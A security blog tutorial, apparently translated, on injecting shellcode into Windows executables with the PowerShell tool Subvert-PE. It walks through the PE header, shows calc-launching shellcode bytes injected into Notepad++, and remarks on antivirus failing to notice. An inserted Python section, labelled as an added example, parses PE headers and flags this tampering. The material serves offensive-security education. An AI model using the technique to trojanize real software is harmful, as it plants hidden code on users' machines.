This article covers how to use PowerShell PE injection to pop a calculator in your face.
We will look at programmatically injecting shellcode into PE executables on disk. Note that we are only talking about exe files here; the PE file format covers many other extensions (dll, ocx, sys, cpl, fon, ...). Doing this by hand is straightforward; the key point is to make sure the PE's functionality is unchanged so as not to raise suspicion. Manual injection is often impractical, though: you would have to copy the PE, modify it on your own machine and then replace the file on the target machine. To simplify the process I wrote Subvert-PE, a script that automates rewriting a PE executable (x86 & x64): it patches the entry point offset, injects the shellcode and returns execution flow to the legitimate code. I like to hand tools to people who take the opportunity to understand how they work. This post therefore focuses on reviewing the relevant parts of the PE format; once you understand the PE structure, modifying it with PowerShell is child's play.
This post may contain information, excerpts and images from Microsoft's official documentation, which are provided under the DMCA fair-use policy. If anyone has a problem with this, please send me an e-mail.
Links:
[Microsoft Official PE-COFF Documentation (MSDN)]
[Portable Executable (Corkami)]
Tools:
[Subvert-PE.ps1]
PE Header
The best way to learn something new is to work through a concrete example. To lay the groundwork in practice, we will walk step by step through the PE header of 32-bit Notepad++. A PE header generally consists of the following components: the MS-DOS header, the Rich signature, the PE header, the optional header and the section table.
I will not highlight every meaningful WORD/DWORD/QWORD in each section, since this is only a rough overview.
MS-DOS header:
In this example the DOS header extends from the start of the image (0x00) through 0x7F (127 bytes).
The important thing to remember here is that at offset 0x3C (60 bytes) there is a DWORD giving the file offset of the actual PE header. The PE header offset is not fixed; it varies from binary to binary. For those who are curious, the static "MZ" identifier corresponds to the initials of Mark Zbikowski, one of the MS-DOS developers.
Rich signature:
The Rich signature is mentioned here mostly out of curiosity. Although the PE format has a long history (Windows 3.1, 1993), this part has been left undocumented by Microsoft. In short, it stores data about how the PE was compiled. For an in-depth overview, read Daniel Pistelli's analysis at [NTCORE](http://www.ntcore.com/files/richsign.htm).
PE header:
The PE header consists of the ASCII signature and the standard COFF file header. Note that there is null-byte padding between the Rich signature and the PE header. For Notepad++ the padding is 0x0F (15 bytes) in size, but the size differs from PE to PE.
A more complete picture is given below, where you can find all possible values for "Machine Type" and "Characteristics". These come from Microsoft's official documentation.
Optional header:
The optional header provides the loader with information needed to load the image. The "optional" part is only optional in the sense that it is usually absent from object files. The size of the optional header varies; it is given by the "Size of Optional Header" field in the PE header above.
Many fields are not highlighted; for a more complete overview, refer to Microsoft's official documentation and [Corkami's analysis]. The image below shows all possible values of the "Subsystem" field.
Section table:
The section table immediately follows the optional header. This ordering is mandatory, because the image contains no pointer to this part; its offset is computed from the combined size of the preceding headers. Each section entry is 0x28 (40 bytes) in size, and the number of sections can be read from the PE header.
The image below shows all possible section flag values; in practice only a few of them show up regularly (readable/executable, initialized data, discardable).
The table above only shows the first section of the Notepad++ PE; the remaining sections (4 in total) follow directly after ".text".
Manipulating binary files with PowerShell
Now that we have a basic understanding of the PE header format, we can look at reading bytes from and writing bytes to a binary file.
Array manipulation:
The first thing to look at is converting between hex bytes and integers.
Interesting, but the main goal is still editing files on disk. I created a simple 4-byte file to illustrate how this is done.
Editing the PE image
Time to put theory into practice. To tackle editing the PE image we set ourselves a simple goal: find the module entry point offset and overwrite it with 0xAABBCCDD.
Running this script in a terminal produces the following result.
Let's see what happens when we load the PE in Immunity Debugger.
You will notice that the entry point is not 0xAABBCCDD but 0xAAFBCCDD. This is expected: when the PE is loaded into memory, the entry point offset is added to the image base, which here is 0x00400000. From our point of view this doesn't matter, since any offset we compute dynamically is added to the image base automatically. Depending on rebasing/ASLR, this base value may be static or dynamic.
Subvert-PE
Time to take off! If we want to modify a PE, the following steps are generally required:
(1) calculate the offset of the null-byte padding at the end of the first executable section;
(2) replace the module entry point with the offset computed in step 1;
(3) write our shellcode at that offset;
(4) append a stub to the shellcode that jumps back to the legitimate entry point.
The image below illustrates this execution flow.
As mentioned in the introduction, performing these steps is no more complicated than computing offsets in an array. For this I wrote Subvert-PE, a script that dynamically modifies PE images and supports both x86 and x64. The Subvert-PE function contains shellcode that launches the calculator; that shellcode was written by SkyLined, and more details on it can be found [here].
Let's look at a practical example.
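The header walkthrough above, the entry-point exercise (0xAABBCCDD becoming 0xAAFBCCDD once the image base is added) and the injection flow just described all come down to reading a handful of offsets out of the PE headers. The following Python script is an added example, not code from the original post or from Subvert-PE: it builds a minimal, constructed PE32 image in memory (no real binary is read), walks DOS header, PE signature, COFF header, optional header and section table exactly as described above, maps the entry point RVA to a file offset and to the loader's virtual address, and, from the defender's side, runs two assumed integrity heuristics that target the artefacts this technique leaves behind: an entry point that falls outside every section's VirtualSize, and non-null bytes in the file-alignment slack of an executable section. The field offsets are those of the PE-COFF specification; the function names, the heuristics and the sample image are my own.

```python
import struct

# Section flags from the PE-COFF spec (IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def build_sample_pe():
    """Construct a minimal PE32 image in memory (constructed test data, not a real binary):
    DOS header (e_lfanew -> 0x80), PE signature, COFF header, 224-byte PE32 optional header,
    one .text section entry and a 0x200-byte raw .text section: 0x120 bytes of "code"
    followed by 0xE0 bytes of null alignment slack."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)              # e_lfanew: file offset of "PE\0\0"
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section, opt size 0xE0
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1010)              # AddressOfEntryPoint (RVA inside .text)
    struct.pack_into("<I", opt, 28, 0x00400000)          # ImageBase (PE32 layout, 32-bit)
    struct.pack_into("<I", opt, 32, 0x1000)              # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)               # FileAlignment
    struct.pack_into("<I", opt, 60, 0x200)               # SizeOfHeaders
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x120, 0x1000, 0x200, 0x200, 0, 0, 0, 0,
                          IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | 0x40000000)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section).ljust(0x200, b"\0")
    text = (b"\xCC" * 0x120).ljust(0x200, b"\0")         # code, then null-byte slack
    return headers + text


def parse_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]       # DWORD at 0x3C points at "PE\0\0"
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 24                                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                                      # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                    # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    sections = []
    for i in range(nsec):                                   # section table sits right after the optional header
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": f[1], "virtual_address": f[2],
                         "raw_size": f[3], "raw_ptr": f[4], "characteristics": f[9]})
    return {"machine": machine, "magic": magic, "entry_point": entry,
            "image_base": image_base, "sections": sections}


def rva_to_offset(sections, rva):
    """Map an RVA to a file offset through the section table (None if unmapped)."""
    for s in sections:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return rva - s["virtual_address"] + s["raw_ptr"]
    return None


def entry_point_va(data):
    """Entry point as the loader sees it: ImageBase + AddressOfEntryPoint (before any rebase)."""
    info = parse_pe(data)
    return info["image_base"] + info["entry_point"]


def patch_entry_point(data, new_rva):
    """The article's exercise: overwrite AddressOfEntryPoint on a copy of the image."""
    out = bytearray(data)
    pe_off = struct.unpack_from("<I", out, 0x3C)[0]
    struct.pack_into("<I", out, pe_off + 24 + 16, new_rva)
    return bytes(out)


def audit(data):
    """Assumed integrity heuristics (not a complete detector): entry point outside every
    section's VirtualSize or inside a non-executable section, and non-null bytes in the
    alignment slack of an executable section, where injected code tends to be placed."""
    info = parse_pe(data)
    findings = []
    ep = info["entry_point"]
    home = [s for s in info["sections"]
            if s["virtual_address"] <= ep < s["virtual_address"] + s["virtual_size"]]
    if not home:
        findings.append("entry point 0x%08X lies outside every section's VirtualSize" % ep)
    elif not home[0]["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry point section %s is not executable" % home[0]["name"])
    for s in info["sections"]:
        start, end = s["raw_ptr"] + s["virtual_size"], s["raw_ptr"] + s["raw_size"]
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and end > start and any(data[start:end]):
            findings.append("non-null bytes in alignment slack of %s (file 0x%X-0x%X)"
                            % (s["name"], start, end))
    return findings


if __name__ == "__main__":
    sample = build_sample_pe()
    info = parse_pe(sample)
    print("Entry point RVA 0x%08X, image base 0x%08X, VA 0x%08X"
          % (info["entry_point"], info["image_base"], entry_point_va(sample)))
    print("Audit of clean image:", audit(sample))
    patched = patch_entry_point(sample, 0xAABBCCDD)
    print("Loader VA after patch: 0x%08X" % entry_point_va(patched))   # 0xAAFBCCDD, as in the article
    print("Audit after patch:", audit(patched))
```

The slack check is deliberately narrow: it only catches code written into the gap between a section's VirtualSize and its SizeOfRawData, which is the null-byte region this technique relies on, and it says nothing about code placed inside the section's real extent. On a real file, pair it with an entry-point and hash comparison against a known-good copy of the binary.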
```
PS C:\Users\b33f> . .\ToolKit\Subvert-PE.ps1
PS C:\Users\b33f> Get-Help Subvert-PE -Full
NAME
Subvert-PE
SYNOPSIS
Inject shellcode into a PE image while retaining the PE functionality.
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Subvert-PE -Path <String> [-Write] [<CommonParameters>]
DESCRIPTION
Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry
point. After the shellcode executes, program execution is handed back over to the legitimate PE entry
point.
PARAMETERS
-Path <String>
Path to portable executable.
Required? true
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
-Write [<SwitchParameter>]
Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image
Base" and dump the memory at the null-byte location.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters?
<CommonParameters>
This cmdlet supports the common parameters: Verbose, Debug,
ErrorAction, ErrorVariable, WarningAction, WarningVariable,
OutBuffer and OutVariable. For more information, type,
"get-help about_commonparameters".
INPUTS
OUTPUTS
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Subvert-PE -Path C:\Path\To\PE.exe
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Subvert-PE -Path C:\Path\To\PE.exe -Write
RELATED LINKS
http://www.fuzzysecurity.com/
PS C:\Users\b33f> Subvert-PE -Path 'C:\Program Files\Notepad++\notepad++.exe' -Write
Legitimate Entry Point Offset: 0x000B7159
Preferred PE Image Base: 0x00400000
Null-Byte Padding dump:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Modified Entry Point Offset: 0x000DA6B6
Inject Far JMP: 0xe9fffdca54
Null-Byte Padding After:
31 D2 52 68 63 61 6C 63 89 E6 52 56 64 8B 72 30 8B 76 0C 8B 76
AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 4C
24 01 F9 42 AD 81 3C 07 57 69 6E 45 75 F5 0F B7 54 51 FE 8B 74
1C 01 FE 03 3C 96 FF D7 E9 54 CA FD FF 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
```
In the screenshot below we can see that Notepad++ starts normally, and the calculator pops up alongside it!
The screenshots below show some sample injections on Windows 7 Professional 32-bit and Windows 8 Enterprise.
Notes:
(1) This script has roughly a 90% success rate on PE executables, but only about 50% on 64-bit systems, because the null-byte padding in x64 binaries is very small. In general you should not run the script with the "-Write" switch,
(2) Obviously the shellcode can be replaced with something more valuable; to avoid abuse, that is not covered here. A few things to keep in mind: since we need to maintain execution flow, the shellcode must not exit; it cannot self-decode, because it lives in the PE's code section, which is not writable; and in a few test cases the PE required the initial register values to run correctly, so those have to be restored after the shellcode runs.
(3) Injecting into a signed binary invalidates the signature, but that is only a concern from a forensics point of view. Also, because we hide the shellcode inside a modified copy of a legitimate executable, AV does not know what is going on and happily lets the program run. I did find that Comodo noticed the modification to the PE; it sandboxed the executable but still allowed it to run. I suspect it detected that the entry point had been tampered with.
(4) Don't be a nuisance; this tool should only be used where you have authorization!